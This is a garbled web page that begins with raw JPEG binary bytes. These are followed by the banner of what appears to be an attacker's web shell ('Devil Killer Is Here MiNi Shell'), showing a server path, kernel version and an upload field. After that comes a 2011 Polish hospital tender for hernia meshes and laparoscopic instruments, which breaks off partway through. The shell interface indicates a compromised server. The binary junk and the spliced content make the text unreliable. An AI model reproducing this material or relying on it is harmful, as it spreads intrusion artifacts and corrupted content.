JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110512/136303-N-2011.html

<p class="kh_header"><b>Toruń: Dostawa siatek do operacyjnego leczenia przepuklin, siatek antyadhezyjnych pępkowych i narzędzi do fiksacji implantów, siatek antyadhezyjnych brzusznych i narzędzi do implantacji.</b><br>
<b>Numer ogłoszenia: 136303 - 2011; data zamieszczenia: 12.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa siatek do operacyjnego leczenia przepuklin, siatek antyadhezyjnych pępkowych i narzędzi do fiksacji implantów, siatek antyadhezyjnych brzusznych i narzędzi do implantacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa: <br>
- Zadanie Nr 1 - siatek do operacyjnego leczenia przepuklin:<br>
1. Siatka do operacyjnego leczenia przepuklin, polipropylenowa z przędzy monofilamentowej, pakowana pojedynczo, bez składania z możliwością łatwego aplikowania laparoskopowo w docelowe miejsce. Opakowanie siatki musi być podwójne i zaopatrzone w samoprzylepną etykietę z możliwością wklejenia jej do protokołu dokumentującego przebieg operacji.<br>
Rozmiary siatek:<br>
- 15 x 15 cm - 150 szt.<br>
-30 x 30 cm - 30 szt.<br><br>

- Zadanie Nr 2 - siatek antyadhezyjnych pępkowych i narzędzi do fiksacji implantów:<br>
1. Siatka antyadhezyjna pępkowa<br>
1.1. 	Siatka antyadhezyjna z wchłanialną błoną hydrofilową z polietylenu i glicerolu, rozmiar siatki 9 cm, okrągła, poliestrowa, multifilamentna, wchłanialna błona wystaje 5 mm nad krawędzią siatki wzmacniającej, waga 75g/m kw., grubość 1,6 2mm, rozmiar pora (HXL=2,55 x 1,72) - 30 szt.<br>
2. Narzędzia do fiksacji implantów<br>
2.1.	Trokar 5 mm, jednorazowego użytku z bezpiecznym ostrzem i zintegrowanym systemem uszczelek, kaniula stabilizowana, dł tulei 100mm. Trokar musi posiadać wbudowany trójpozycyjny zawór pozwalający na insuflację i desuflację dwutlenku węgla do i z jamy brzusznej - 50 szt.<br>
2.2.	Trokar 5- 11 mm, jednorazowego użytku z bezpiecznym ostrzem i zintegrowanym systemem uszczelek, kaniula stabilizowana, dł tulei 100mm. Trokar musi posiadać wbudowany trójpozycyjny zawór pozwalający na insuflację i desuflację dwutlenku węgla do i z jamy brzusznej - 50 szt.<br>
2.3.	Trokar 5- 12 mm, jednorazowego użytku z bezpiecznym ostrzem i zintegrowanym systemem uszczelek, kaniula stabilizowana, dł tulei 100mm. Trokar musi posiadać wbudowany trójpozycyjny zawór pozwalający na insuflację i desuflację dwutlenku węgla do i z jamy brzusznej - 20 szt.<br>
2.4.	Kaniule jednorazowego użytku śr. 5, 11, 12mm, dł 100mm, kaniule stabilizowane z utrzymującym w powłokach skórnych ożebrowaniem, uszczelka zabezpieczająca przed utratą odmy, wbudowany trójpozycyjny zawór służący do insuflacji i desuflacji - 150 szt.<br>
2.5.	Nożyczki laparoskopowe, jednorazowe, śr 5 mm, odgięte z możliwością koagulacji monopolarnej i rotacji 360 stopni - 50 szt.<br>
2.6.	Jednorazowe kleszczyki chwytne typu disektor, zakrzywione bez mechanizmu blokującego, śr. 5 mm, dł. 31 -33cm	 - 50 szt.<br>
2.7.	Jednorazowy worek na pobrany materiał do trokaru 10mm z pełną rozkładaną obręczą, pojemność ok. 190 ml - 120 szt.<br>
2.8.	Jednorazowy worek na pobrany materiał do trokaru 15mm z pełną rozkładaną obręczą, pojemność ok. 1500ml - 10 szt.<br>
2.9.	Jednorazowa igła Weressa, stalowa, 120mm dł, 14 G kaliber, z wskaźnikiem bezpieczeństwa - 12 szt.<br>
2.10.	Klipsownica automatyczna śr 5mm, dł trzonu 33 cm, jednorazowego użytku z tytanowymi klipsami, rozmiar klipsa 8,9 - 9,1 mm z systemem pozwalającym preparowanie narzędziem - 18 szt.<br>
2.11.	Szew pętlowy z nitką wchłanialną o całkowitej hydrolizie w około 70 dni i grubości 2/0 - 50 szt.<br>
2.12.	Instrument jednorazowego użytku do mocowania siatek przepuklinowych z 30 tytanowymi wkrętami, wysokość aktywna 3,8 mm, śred. Aplikatora 5 mm, dł 35,5 cm - 40 szt.<br>
2.13.	Stapler przegubowy kąt 22, 45, 65 stopni do mocowania siatki , rotacja do 360 stopni, średnica 12 mm, 10 zszywek w ładunku, rozmiar otwartej zszywki 4,0mm, zamkniętej 3,0 mm - 6 szt.<br>
2.14.	Ładunki do staplera przegubowego, 10 zszywek w ładunku, otwarta zszywka 4,8 mm, zamknięta 3,0mm - 50 szt.<br>
2.15	Urządzenie do przeprowadzania nici kierunkowych - 12 szt.<br><br>
- Zadanie Nr 3 - siatek antyadhezyjnych brzusznych i narzędzi do implantacji:<br>
1. Siatka antyadhezyjna brzuszna<br>
1.1. 	Siatka elastyczna, składająca się z niewchłanialnej, mikroporowej siatki polipropylenowej, pokryta z obu stron warstwą separującą w postaci wchłanialnego poliglekapronu i polidwuoksanu. Przezroczysta ze znacznikiem ułatwiającym orientację podczas implantacji<br>
rozmiar:<br>
- 15 x 15 cm - 30 szt.<br>
- 20 x 25 cm - 6 szt. <br>
1.2. 	Lekka, częściowo wchłanialna siatka do operacyjnego leczenia przepuklin brzusznych, składająca się z dwóch rodzajów nici jednowłóknowych, z których jedna jest barwiona i ulega wchłonięciu, a druga nie, pozostawiając w ten sposób szkielet przeznaczony do wsparcia tkanek przy długoterminowej stabilizacji struktur powięziowych ściany brzusznej. Pakowana podwójnie i zaopatrzona w tzw. paszport dwustronnego naklejania. Rozmiar 15 x 15 cm - 10 szt.<br>
2. Narzędzia do implantacji<br>
2.1.	Trokar 5 mm z bezpiecznym ostrzem, żebrowana, niegwintowana, przezierna kaniula ze ściętym szczytem, główka niskoprofilowa, zintegrowany system uszczelek, uniwersalna redukcja dł. kaniuli 100mm - 80 szt.<br>
2.2.	Trokar 11 mm z bezpiecznym ostrzem, żebrowana, niegwintowana, przezierna kaniula ze ściętym szczytem, główka niskoprofilowa, zintegrowany system uszczelek, uniwersalna redukcja, dł kaniuli 100mm - 80 szt.<br>
2.3.	Trokar 12 mm z bezpiecznym ostrzem, żebrowana, niegwintowana, przezierna kaniula ze ściętym szczytem, główka niskoprofilowa, zintegrowany system uszczelek, uniwersalna redukcja, dł kaniuli 100mm - 30 szt.<br>
2.4.	Trokary bez ostrzy z bocznymi separatorami tkanek i elementem optycznym, żebrowana, niegwintowana przezierna kaniula, ze ściętym szczytem, główka niskoprofilowa, rozmiar, 5mm, 11mm, 12mm - 80 szt.<br>
2.5.	Endoskopowa klipsownica wielostrzałowa, zawierająca 20 tytanowych klipsów, przesuwających się automatycznie po każdej aplikacji, posiadająca mechanizm zapadkowy oraz szczęki ustawione kątowo, ramie obrotowe 360 st., 12mm śr. 34cm dł., klipsy duże, wys. otwartego klipsa 4,2 mm, jednorazowa, sterylna - 30 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych min. 2 dostaw sprzętu medycznego o wartości min. dla poszczególnych zadań:
-	Zadanie Nr 1 -      2.940,00 zł,
-	Zadanie Nr 2 -  116.310,00 zł,
-	Zadanie Nr 3 -    64.140,00 zł,
brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;
Wykonawca składający ofertę na obydwa zadania musi wykazać się zrealizowanymi 
min. 2 dostawami o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta np. Wykonawca składający ofertę na zad. Nr 1 i Nr 2 musi wykazać się zrealizowanymi 2 dostawami o wymaganej wartości łącznej równej sumie 119.250,00 zł każda dostawa.
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
-	Zadanie Nr 1 -      4.450,00 zł,
-	Zadanie Nr 2 -    96.925,00 zł,
-	Zadanie Nr 3 -    53.450,00 zł,
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/ Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.
Wykonawca składający ofertę na obydwa zadania musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.
      Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

      Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	zgłoszenie do Prezesa Urzędu Rejestracji Wyrobów Medycznych potwierdzające, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 maja 2010 r. 
o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679) lub aktualny certyfikat zgodności  wyrobu z wymaganiami zasadniczymi. <br>

b) katalogi/ prospekty oferowanego przedmiotu zamówienia potwierdzające spełnienie parametrów wymaganych przez Zamawiającego.<br>

c) próbki oferowanych siatek - po min. 1 szt. z każdego asortymentu.
 Wykonawca zobowiązany jest do dostarczenia próbek oferowanego przedmiotu zamówienia najpóźniej w dniu i do godziny wyznaczonej na składanie ofert. Próbki muszą być 
w oryginalnych opakowaniach handlowych producenta.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
*Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków.<br>
*Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, 
o których mowa w art. 24 ust. 1.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym.

2. Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie stanowiła zmiany umowy i nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa siatek do operacyjnego leczenia przepuklin - Zadanie Nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Siatka do operacyjnego leczenia przepuklin, polipropylenowa z przędzy monofilamentowej, pakowana pojedynczo, bez składania z możliwością łatwego aplikowania laparoskopowo w docelowe miejsce. Opakowanie siatki musi być podwójne i zaopatrzone w samoprzylepną etykietę z możliwością wklejenia jej do protokołu dokumentującego przebieg operacji.<br>
Rozmiary siatek:<br>
- 15 x 15 cm - 150 szt.<br>
-30 x 30 cm - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa siatek antyadhezyjnych pępkowych i narzędzi do fiksacji implantów - Zadanie Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Siatka antyadhezyjna pępkowa<br>
1.1. 	Siatka antyadhezyjna z wchłanialną błoną hydrofilową z polietylenu i glicerolu, rozmiar siatki 9 cm, okrągła, poliestrowa, multifilamentna, wchłanialna błona wystaje 5 mm nad krawędzią siatki wzmacniającej, waga 75g/m kw., grubość 1,6 2mm, rozmiar pora (HXL=2,55 x 1,72) - 30 szt.<br>
2. Narzędzia do fiksacji implantów<br>
2.1.	Trokar 5 mm, jednorazowego użytku z bezpiecznym ostrzem i zintegrowanym systemem uszczelek, kaniula stabilizowana, dł tulei 100mm. Trokar musi posiadać wbudowany trójpozycyjny zawór pozwalający na insuflację i desuflację dwutlenku węgla do i z jamy brzusznej - 50 szt.<br>
2.2.	Trokar 5- 11 mm, jednorazowego użytku z bezpiecznym ostrzem i zintegrowanym systemem uszczelek, kaniula stabilizowana, dł tulei 100mm. Trokar musi posiadać wbudowany trójpozycyjny zawór pozwalający na insuflację i desuflację dwutlenku węgla do i z jamy brzusznej - 50 szt.<br>
